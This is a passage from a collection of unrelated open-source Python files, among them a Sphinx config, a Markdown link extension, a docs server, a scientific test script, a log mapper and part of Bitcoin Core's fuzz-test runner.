                page_saved.send_robust(sender='moin',
                                       page=page,
                                       author=None,
                                       message=options['message'],
                                       form_extra_data={})
            else:
                print('Nothing changed. Ignoring update')
| RobertoMaurizzi/waliki | waliki/management/commands/moin_migration_cleanup.py | Python | bsd-3-clause | 6,418 |
# -*- coding: utf-8 -*-
#
# Pontoon documentation build configuration file, created by
# sphinx-quickstart on Thu Jun 4 21:51:51 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.graphviz',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Pontoon'
copyright = u'2015, Matjaž Horvat, Mozilla Foundation'
author = u'Matjaž Horvat, Mozilla Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0'
# The full version, including alpha/beta/rc tags.
release = '1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build', 'venv']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Pontoondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Pontoon.tex', u'Pontoon Documentation',
u'Matjaž Horvat, Mozilla Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pontoon', u'Pontoon Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Pontoon', u'Pontoon Documentation',
author, 'Pontoon', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| jotes/pontoon | docs/conf.py | Python | bsd-3-clause | 9,297 |
from better_zoom import BetterZoom
from better_selecting_zoom import BetterSelectingZoom
from broadcaster import BroadcasterTool
from dataprinter import DataPrinter
from data_label_tool import DataLabelTool
from enable.tools.drag_tool import DragTool
from draw_points_tool import DrawPointsTool
from drag_zoom import DragZoom
from highlight_tool import HighlightTool
from image_inspector_tool import ImageInspectorTool, ImageInspectorOverlay
from lasso_selection import LassoSelection
from legend_tool import LegendTool
from legend_highlighter import LegendHighlighter
from line_inspector import LineInspector
from line_segment_tool import LineSegmentTool
from move_tool import MoveTool
from pan_tool import PanTool
from point_marker import PointMarker
from range_selection import RangeSelection
from range_selection_2d import RangeSelection2D
from range_selection_overlay import RangeSelectionOverlay
from regression_lasso import RegressionLasso, RegressionOverlay
from save_tool import SaveTool
from scatter_inspector import ScatterInspector
from select_tool import SelectTool
from simple_inspector import SimpleInspectorTool
from tool_states import ZoomState, PanState, GroupedToolState, SelectedZoomState
from tracking_pan_tool import TrackingPanTool
from tracking_zoom import TrackingZoom
from traits_tool import TraitsTool
from zoom_tool import ZoomTool
# EOF
| tommy-u/chaco | chaco/tools/api.py | Python | bsd-3-clause | 1,366 |
#!/usr/bin/env python
from __future__ import print_function
from __future__ import absolute_import
import os
from . import spd
# K temps: [0.0, 100.0, 150.0, 200.0, 225.0, 250.0, 275.0, 300.0, 325.0, 350.0, 375.0, 400.0, 425.0, 450.0, 475.0, 500.0, 525.0, 550.0]
# C temps: [273, 373.0, 423.0, 473.0, 498.0, 523.0, 548.0, 573.0, 598.0, 623.0, 648.0, 673.0, 698.0, 723.0, 748.0, 773.0, 798.0, 823.0]
from . import new_lj_thellier_gui_spd as tgs
cwd = os.getcwd()
main_dir = cwd + '/SPD'
calculate = ['int_n', 'frac', 'fvds', 'b_sigma', 'b_beta', 'scat', 'g', 'k', 'k_sse', 'z', 'int_mad_anc', 'int_dang', 'int_alpha', 'alpha_prime', 'theta', 'gamma', 'int_ptrm_n', 'ptrm', 'drat', 'mdrat', 'maxdev', 'dpal', 'md', 'tail_drat', 'dtr', 'dac', 'DANG']
#calculate = ['int_n', 'frac', 'f', 'fvds', 'b_sigma', 'b_beta', 'scat', 'g', 'k', 'k_sse', 'z', 'z_md', 'q', 'r_sq', 'coeff_det_sq', 'int_mad', 'int_mad_anc', 'int_dang', 'int_alpha', 'alpha_prime', 'theta', 'int_crm', 'gamma', 'int_ptrm_n', 'ptrm', 'drat', 'drats', 'cdrat', 'mdrat', 'dck', 'maxdev', 'mdev', 'dpal', 'int_ptrm_tail_n', 'md', 'tail_drat', 'dtr', 'dt', 'ac_n', 'dac', 'gmax']
#calculate = ['int_n', 'int_alpha', 'f', 'k', 'drats', 'int_ptrm_tail_n']
#calculate = ['drats']
gui = tgs.Arai_GUI('/magic_measurements.txt', main_dir)
specimens = list(gui.Data.keys())
example = spd.PintPars(gui.Data, '0238x6011044', 473., 623., 'magic', calculate)
example.calculate_all_statistics()
PintPars_example = example
def make_specimens(calculate=calculate):
    """Build one PintPars specimen per statistic name and compute its
    required statistics.

    `calculate` defaults to the module-level list of statistic names
    (bound once at definition time).
    """
    for stat in calculate:
        spec = spd.PintPars(gui.Data, '0238x6011044', 473., 623., 'magic', [stat])
        spec.reqd_stats()
        print('---------')
    # NOTE(review): indentation reconstructed -- this final print appears
    # to sit after the loop; confirm against upstream.
    print(calculate)
def many_specimens(calculate=calculate):
    """Run PintPars over every 2-combination of statistic names; used to
    exercise interactions between pairs of requested statistics."""
    from itertools import combinations
    c = combinations(calculate, 2)
    for combo in c:
        print('combo', combo)
        spec = spd.PintPars(gui.Data, '0238x6011044', 473., 623., 'magic', combo)
        spec.reqd_stats()
        print('XXXXXXXXXXXXXXX')
        #spec.calculate_all_statistics()
SCAT_spec = spd.PintPars(gui.Data, '0238x6011044', 273., 673.) # 0, 400
SCAT_spec2 = spd.PintPars(gui.Data, '0238x6011044', 273., 698.) # 0, 425
SCAT_spec.York_Regression()
SCAT_spec2.York_Regression()
#new_spec = spd.PintPars(gui.Data, '0238x5721062', 100. + 273., 525. + 273.)
#new_spec.calculate_all_statistics()
#gui2 = tgs.Arai_GUI('/consistency_tests/Yamamoto_Hushi_2008_magic_measurements.txt', cwd)
#thing2 = spd.PintPars(gui2.Data, 'SW01-01A-2', 100. + 273., 480. + 273.)
#thing2 = PintPars(gui.Data, specimens[0], 473., 623.)
#thing2.calculate_all_statistics()
#thing3 = PintPars(gui.Data, specimens[1], 473., 623.)
#thing3.calculate_all_statistics()
#thing4 = PintPars(gui.Data, specimens[2], 473., 623.)
#thing4.calculate_all_statistics()
#thing5 = PintPars(gui.Data, specimens[3], 473., 623.)
#thing5.calculate_all_statistics()
#thing6 = PintPars(gui.Data, specimens[4], 473., 623.)
#thing6.calculate_all_statistics()
#gui2 = tgs.Arai_GUI('new_magic_measurements.txt')
#gui3 = tgs.Arai_GUI('consistency_tests/Bowles_etal_2006_magic_measurements.txt')
#gui4 = tgs.Arai_GUI('consistency_tests/Donadini_etal_2007_magic_measurements.txt')
#gui5 = tgs.Arai_GUI('consistency_tests/Krasa_2000_magic_measurements.txt')
#gui6 = tgs.Arai_GUI('consistency_tests/Muxworthy_etal_2011_magic_measurements.txt')
#gui7 = tgs.Arai_GUI('consistency_tests/Paterson_etal_2010_magic_measurements.txt')
#gui8 = tgs.Arai_GUI('consistency_tests/Selkin_etal_2000_magic_measurements.txt')
#gui10 = tgs.Arai_GUI('consistency_tests/Yamamoto_etal_2003_magic_measurements.txt')
| Caoimhinmg/PmagPy | SPD/test_instance.py | Python | bsd-3-clause | 3,635 |
from __future__ import print_function
import flask
import os
import threading
import time
import webbrowser
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
_basedir = os.path.join("..", os.path.dirname(__file__))
app = flask.Flask(__name__, static_path="/unused")
PORT=5009
http_server = HTTPServer(WSGIContainer(app))
"""this is a simple server to facilitate developing the docs. by
serving up static files from this server, we avoid the need to use a
symlink.
"""
@app.route('/')
def welcome():
    """Root route: minimal landing page linking to the rendered docs index."""
    return """
<h1>Welcome to the Bokeh documentation server</h1>
You probably want to go to <a href="/en/latest/index.html"> Index</a>
"""
@app.route('/en/latest/<path:filename>')
def send_pic(filename):
    """Serve *filename* from the built Sphinx HTML tree."""
    docs_root = os.path.join(_basedir, "sphinx/_build/html/")
    return flask.send_from_directory(docs_root, filename)
def open_browser():
    """Open the served docs index in a new browser tab (run from a helper thread)."""
    # Give the HTTP server a moment to start listening first.
    time.sleep(0.5)
    # Bug fix: webbrowser.open expects an int for `new` (2 = new tab).
    # The previous value, the string "tab", was not a recognized value and
    # fell back to default same-window behaviour.
    webbrowser.open("http://localhost:%d/en/latest/index.html" % PORT, new=2)
def serve_http():
    """Bind the Tornado HTTP server to PORT and start the IO loop.

    Blocks until the loop is stopped (see shutdown_server()).
    """
    http_server.listen(PORT)
    IOLoop.instance().start()
def shutdown_server():
    """Ask the Tornado IO loop to stop, safely from another thread
    (add_callback is the thread-safe way to schedule the stop)."""
    loop = IOLoop.instance()
    loop.add_callback(loop.stop)
    print("Asked Server to shut down.")
def ui():
    """Block until the user presses ENTER, then return.

    Uses raw_input on Python 2: this file is Python-2 compatible (see the
    print_function future import), and Python 2's input() would eval()
    whatever the user types.
    """
    time.sleep(0.5)
    try:
        prompt = raw_input
    except NameError:  # Python 3: input() is already the safe, non-eval form
        prompt = input
    prompt("Press <ENTER> to exit...\n")
if __name__ == "__main__":
print("\nStarting Bokeh plot server on port %d..." % PORT)
print("Visit http://localhost:%d/en/latest/index.html to see plots\n" % PORT)
t_server = threading.Thread(target=serve_http)
t_server.start()
t_browser = threading.Thread(target=open_browser)
t_browser.start()
ui()
shutdown_server()
t_server.join()
t_browser.join()
print("Server shut down.")
| phobson/bokeh | sphinx/docserver.py | Python | bsd-3-clause | 1,749 |
"""
Magic Link.
pymdownx.magiclink
An extension for Python Markdown.
Find http|ftp links and email address and turn them to actual links
MIT license.
Copyright (c) 2014 - 2017 Isaac Muse <isaacmuse@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import unicode_literals
from markdown import Extension
from markdown.inlinepatterns import LinkPattern, Pattern
from markdown.treeprocessors import Treeprocessor
from markdown import util as md_util
import re
RE_MAIL = r'''(?xi)
(
(?<![-/\+@a-z\d_])(?:[-+a-z\d_]([-a-z\d_+]|\.(?!\.))*) # Local part
(?<!\.)@(?:[-a-z\d_]+\.) # @domain part start
(?:(?:[-a-z\d_]|(?<!\.)\.(?!\.))*)[a-z]\b # @domain.end (allow multiple dot names)
(?![-@]) # Don't allow last char to be followed by these
)
'''
RE_LINK = r'''(?xi)
(
(?:(?<=\b)|(?<=_))(?:
(?:ht|f)tps?://(?:(?:[^_\W][-\w]*(?:\.[-\w.]+)+)|localhost)| # (http|ftp)://
(?P<www>w{3}\.)[^_\W][-\w]*(?:\.[-\w.]+)+ # www.
)
/?[-\w.?,!'(){}\[\]/+&@%$#=:"|~;]* # url path, fragments, and query stuff
(?:[^_\W]|[-/#@$+=]) # allowed end chars
)
'''
RE_AUTOLINK = r'(?i)<((?:ht|f)tps?://[^>]*)>'
RE_REPO_LINK = re.compile(
r'''(?xi)
(?:
(?P<github>(?P<github_base>https://(?:w{3}\.)?github.com/(?P<github_user_repo>[^/]+/[^/]+))/
(?:issues/(?P<github_issue>\d+)/?|
pull/(?P<github_pull>\d+)/?|
commit/(?P<github_commit>[\da-f]+)/?)) |
(?P<bitbucket>(?P<bitbucket_base>https://(?:w{3}\.)?bitbucket.org/(?P<bitbucket_user_repo>[^/]+/[^/]+))/
(?:issues/(?P<bitbucket_issue>\d+)(?:/[^/]+)?/?|
pull-requests/(?P<bitbucket_pull>\d+)(?:/[^/]+(?:/diff)?)?/?|
commits/commit/(?P<bitbucket_commit>[\da-f]+)/?)) |
(?P<gitlab>(?P<gitlab_base>https://(?:w{3}\.)?gitlab.com/(?P<gitlab_user_repo>[^/]+/[^/]+))/
(?:issues/(?P<gitlab_issue>\d+)/?|
merge_requests/(?P<gitlab_pull>\d+)/?|
commit/(?P<gitlab_commit>[\da-f]+)/?))
)
'''
)
class MagicShortenerTreeprocessor(Treeprocessor):
"""Treeprocessor that finds repo issue and commit links and shortens them."""
# Repo link types
ISSUE = 0
PULL = 1
COMMIT = 2
    def shorten(self, link, my_repo, link_type, user_repo, value, url, hash_size):
        """Rewrite the anchor *link* in place to the short reference form.

        Commits become ``user/repo@`hash``` (hash truncated to *hash_size*
        characters); issues and pulls become ``user/repo#number``. When
        *my_repo* is true the ``user/repo`` prefix is omitted.

        NOTE(review): the *url* parameter is accepted but never used here.
        """
        if link_type is self.COMMIT:
            # user/repo@`hash`
            text = '' if my_repo else user_repo + '@'
            link.text = md_util.AtomicString(text)

            # Need a root with an element for things to get processed.
            # Send the `value` through and retrieve it from the p element.
            # Pop it off and add it to the link.
            el = md_util.etree.Element('div')
            p = md_util.etree.SubElement(el, 'p')
            p.text = '`%s`' % value[0:hash_size]
            el = self.markdown.treeprocessors['inline'].run(el)
            p = list(el)[0]
            for child in list(p):
                link.append(child)
                p.remove(child)
        else:
            # user/repo#(issue|pull)
            link.text = ('#' + value) if my_repo else (user_repo + '#' + value)
def get_provider(self, match):
"""Get the provider and hash size."""
# Set provider specific variables
if match.group('github'):
provider = 'github'
hash_size = 7
elif match.group('bitbucket'):
provider = 'bitbucket'
hash_size = 7
elif match.group('gitlab'):
provider = 'gitlab'
hash_size = 8
return provider, hash_size
def get_type(self, provider, match):
"""Get the link type."""
# Gather info about link type
if match.group(provider + '_commit') is not None:
value = match.group(provider + '_commit')
link_type = self.COMMIT
elif match.group(provider + '_pull') is not None:
value = match.group(provider + '_pull')
link_type = self.PULL
else:
value = match.group(provider + '_issue')
link_type = self.ISSUE
return value, link_type
def is_my_repo(self, provider, match):
"""Check if link is from our specified repo."""
# See if these links are from the specified repo.
my_repo = match.group(provider + '_base') == self.base
if not my_repo and self.hide_protocol:
my_repo = match.group(provider + '_base') == ('https://' + self.base)
return my_repo
def run(self, root):
"""Shorten popular git repository links."""
self.base = self.config.get('base_repo_url', '').rstrip('/')
self.hide_protocol = self.config['hide_protocol']
links = root.iter('a')
for link in links:
has_child = len(list(link))
is_magic = link.attrib.get('magiclink')
href = link.attrib.get('href', '')
text = link.text
if is_magic:
del link.attrib['magiclink']
# We want a normal link. No subelements embedded in it, just a normal string.
if has_child or not text: # pragma: no cover
continue
# Make sure the text matches the href. If needed, add back protocol to be sure.
# Not all links will pass through MagicLink, so we try both with and without protocol.
if text == href or (is_magic and self.hide_protocol and ('https://' + text) == href):
m = RE_REPO_LINK.match(href)
if m:
provider, hash_size = self.get_provider(m)
my_repo = self.is_my_repo(provider, m)
value, link_type = self.get_type(provider, m)
# All right, everything set, let's shorten.
self.shorten(
link,
my_repo,
link_type,
m.group(provider + '_user_repo'),
value,
href,
hash_size
)
return root
class MagiclinkPattern(LinkPattern):
    """Convert html, ftp links to clickable links."""

    def handleMatch(self, m):
        """Build an ``<a>`` element for the matched bare URL."""
        matched = m.group(2)
        anchor = md_util.etree.Element("a")
        anchor.text = md_util.AtomicString(matched)
        # A bare "www." link gets an implicit http:// scheme for the href.
        href = "http://%s" % matched if m.group("www") else matched
        if self.config['hide_protocol']:
            # Drop "scheme://" from the visible text only; href keeps it.
            shown = anchor.text
            anchor.text = md_util.AtomicString(shown[shown.find("://") + 3:])
        if self.config.get('repo_url_shortener', False):
            # Tag the element so MagicShortenerTreeprocessor can find it later.
            anchor.set('magiclink', '1')
        anchor.set("href", self.sanitize_url(self.unescape(href.strip())))
        return anchor
class MagiclinkAutoPattern(Pattern):
    """Return a link Element given an autolink `<http://example/com>`."""

    def handleMatch(self, m):
        """Build the anchor, optionally hiding the protocol in its text."""
        url = m.group(2)
        anchor = md_util.etree.Element("a")
        anchor.set('href', self.unescape(url))
        anchor.text = md_util.AtomicString(url)
        if self.config['hide_protocol']:
            # Strip "scheme://" from the displayed text; href is untouched.
            shown = anchor.text
            anchor.text = md_util.AtomicString(shown[shown.find("://") + 3:])
        if self.config.get('repo_url_shortener', False):
            # Mark for the repo-link shortener treeprocessor.
            anchor.attrib['magiclink'] = '1'
        return anchor
class MagicMailPattern(LinkPattern):
    """Convert emails to clickable email links."""

    def email_encode(self, code):
        """Return an HTML entity reference for code point *code*.

        ``md_util.AMP_SUBSTITUTE`` stands in for ``&`` so Markdown's
        serializer emits ``&#NN;`` — a light obfuscation of the address
        against naive scrapers.
        """
        return "%s#%d;" % (md_util.AMP_SUBSTITUTE, code)

    def handleMatch(self, m):
        """Handle email link patterns.

        Entity-encodes both the visible text and the ``mailto:`` href.
        Previously the href branch re-implemented the encoding inline;
        it now reuses ``email_encode`` (identical output).
        """
        el = md_util.etree.Element("a")
        email = self.unescape(m.group(2))
        href = "mailto:%s" % email
        el.text = md_util.AtomicString(''.join([self.email_encode(ord(c)) for c in email]))
        el.set("href", ''.join([self.email_encode(ord(c)) for c in href]))
        return el
class MagiclinkExtension(Extension):
    """Add Easylink extension to Markdown class.

    Registers the autolink/bare-link/email inline patterns and, when
    ``repo_url_shortener`` is enabled, the repo-link shortener
    treeprocessor.
    """
    def __init__(self, *args, **kwargs):
        """Initialize."""
        # Standard Python-Markdown config schema: name -> [default, help].
        self.config = {
            'hide_protocol': [
                False,
                "If 'True', links are displayed without the initial ftp://, http:// or https://"
                "- Default: False"
            ],
            'repo_url_shortener': [
                False,
                "If 'True' repo commit and issue links are shortened - Default: False"
            ],
            'base_repo_url': [
                '',
                'The base repo url to use - Default: ""'
            ]
        }
        super(MagiclinkExtension, self).__init__(*args, **kwargs)
    def extendMarkdown(self, md, md_globals):
        """Add support for turning html links and emails to link tags."""
        config = self.getConfigs()
        # Patterns receive the resolved config dict as a plain attribute.
        auto_link_pattern = MagiclinkAutoPattern(RE_AUTOLINK, md)
        auto_link_pattern.config = config
        link_pattern = MagiclinkPattern(RE_LINK, md)
        link_pattern.config = config
        # Replace the built-in autolink pattern and add ours before 'entity'.
        md.inlinePatterns['autolink'] = auto_link_pattern
        md.inlinePatterns.add("magic-link", link_pattern, "<entity")
        md.inlinePatterns.add("magic-mail", MagicMailPattern(RE_MAIL, md), "<entity")
        if config.get('repo_url_shortener', False):
            shortener = MagicShortenerTreeprocessor(md)
            shortener.config = config
            # Must run before 'prettify' so shortened text gets formatted.
            md.treeprocessors.add("magic-repo-shortener", shortener, "<prettify")
def makeExtension(*args, **kwargs):
    """Return extension (Python-Markdown entry-point hook)."""
    ext = MagiclinkExtension(*args, **kwargs)
    return ext
| brunobergher/dotfiles | sublime/pymdownx/st3/pymdownx/magiclink.py | Python | mit | 10,950 |
"""Hadoop streaming mapper: emit one "page<TAB>ip" record per access-log line.

Reads space-delimited web-server log lines from stdin.  Lines that do not
split into exactly 10 fields are silently skipped (malformed records).
"""
import sys

for line in sys.stdin:
    data = line.strip().split(" ")
    # Common-Log-Format lines split into exactly 10 space-separated fields.
    if len(data) == 10:
        page = data[6]        # requested resource path
        ip_address = data[0]  # client address
        # Parenthesized single-argument print is valid (and identical) on
        # both Python 2 and Python 3; the bare print statement was Py2-only.
        print("{0}\t{1}".format(page, ip_address))
#!/usr/bin/env python3
# Copyright (c) 2019-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run fuzz test targets.
"""
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
import configparser
import logging
import os
import subprocess
import sys
def get_fuzz_env(*, target, source_dir):
    """Build the environment dict for launching one fuzz-target subprocess."""
    ubsan_opts = (
        'suppressions={}/test/sanitizer_suppressions/ubsan'
        ':print_stacktrace=1:halt_on_error=1:report_error_type=1'.format(source_dir)
    )
    # symbolizer disabled due to https://github.com/google/sanitizers/issues/1364#issuecomment-761072085
    asan_opts = 'symbolize=0:detect_stack_use_after_return=1:check_initialization_order=1:strict_init_order=1'
    return {
        'FUZZ': target,
        'UBSAN_OPTIONS': ubsan_opts,
        'ASAN_OPTIONS': asan_opts,
    }
def main():
    """Parse arguments, discover fuzz targets, and dispatch the chosen mode.

    Modes: generate corpus seeds (--generate), merge an external corpus
    (--m_dir), or run every selected target once over its seed corpus
    (default).  Exits non-zero on configuration or execution failure.
    """
    parser = argparse.ArgumentParser(
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
        description='''Run the fuzz targets with all inputs from the seed_dir once.''',
    )
    parser.add_argument(
        "-l",
        "--loglevel",
        dest="loglevel",
        default="INFO",
        help="log events at this level and higher to the console. Can be set to DEBUG, INFO, WARNING, ERROR or CRITICAL. Passing --loglevel DEBUG will output all logs to console.",
    )
    parser.add_argument(
        '--valgrind',
        action='store_true',
        help='If true, run fuzzing binaries under the valgrind memory error detector',
    )
    parser.add_argument(
        '-x',
        '--exclude',
        help="A comma-separated list of targets to exclude",
    )
    parser.add_argument(
        '--par',
        '-j',
        type=int,
        default=4,
        help='How many targets to merge or execute in parallel.',
    )
    parser.add_argument(
        'seed_dir',
        help='The seed corpus to run on (must contain subfolders for each fuzz target).',
    )
    parser.add_argument(
        'target',
        nargs='*',
        help='The target(s) to run. Default is to run all targets.',
    )
    parser.add_argument(
        '--m_dir',
        help='Merge inputs from this directory into the seed_dir.',
    )
    parser.add_argument(
        '-g',
        '--generate',
        action='store_true',
        help='Create new corpus seeds (or extend the existing ones) by running'
             ' the given targets for a finite number of times. Outputs them to'
             ' the passed seed_dir.'
    )
    args = parser.parse_args()
    # Set up logging
    logging.basicConfig(
        format='%(message)s',
        # Accept either a numeric level or a level name.
        level=int(args.loglevel) if args.loglevel.isdigit() else args.loglevel.upper(),
    )
    # Read config generated by configure.
    config = configparser.ConfigParser()
    configfile = os.path.abspath(os.path.dirname(__file__)) + "/../config.ini"
    config.read_file(open(configfile, encoding="utf8"))
    if not config["components"].getboolean("ENABLE_FUZZ"):
        logging.error("Must have fuzz targets built")
        sys.exit(1)
    # Build list of tests
    test_list_all = parse_test_list(fuzz_bin=os.path.join(config["environment"]["BUILDDIR"], 'src', 'test', 'fuzz', 'fuzz'))
    if not test_list_all:
        logging.error("No fuzz targets found")
        sys.exit(1)
    logging.debug("{} fuzz target(s) found: {}".format(len(test_list_all), " ".join(sorted(test_list_all))))
    args.target = args.target or test_list_all  # By default run all
    # Warn about requested targets the binary does not know about.
    test_list_error = list(set(args.target).difference(set(test_list_all)))
    if test_list_error:
        logging.error("Unknown fuzz targets selected: {}".format(test_list_error))
    test_list_selection = list(set(test_list_all).intersection(set(args.target)))
    if not test_list_selection:
        logging.error("No fuzz targets selected")
    if args.exclude:
        for excluded_target in args.exclude.split(","):
            if excluded_target not in test_list_selection:
                logging.error("Target \"{}\" not found in current target list.".format(excluded_target))
                continue
            test_list_selection.remove(excluded_target)
    test_list_selection.sort()
    logging.info("{} of {} detected fuzz target(s) selected: {}".format(len(test_list_selection), len(test_list_all), " ".join(test_list_selection)))
    if not args.generate:
        # Report targets with an empty/missing corpus (informational only).
        test_list_seedless = []
        for t in test_list_selection:
            corpus_path = os.path.join(args.seed_dir, t)
            if not os.path.exists(corpus_path) or len(os.listdir(corpus_path)) == 0:
                test_list_seedless.append(t)
        test_list_seedless.sort()
        if test_list_seedless:
            logging.info(
                "Fuzzing harnesses lacking a seed corpus: {}".format(
                    " ".join(test_list_seedless)
                )
            )
            logging.info("Please consider adding a fuzz seed corpus at https://github.com/bitcoin-core/qa-assets")
    # Sanity-check that the binary was built with libFuzzer before fanning out.
    try:
        help_output = subprocess.run(
            args=[
                os.path.join(config["environment"]["BUILDDIR"], 'src', 'test', 'fuzz', 'fuzz'),
                '-help=1',
            ],
            env=get_fuzz_env(target=test_list_selection[0], source_dir=config['environment']['SRCDIR']),
            timeout=20,
            check=True,
            stderr=subprocess.PIPE,
            universal_newlines=True,
        ).stderr
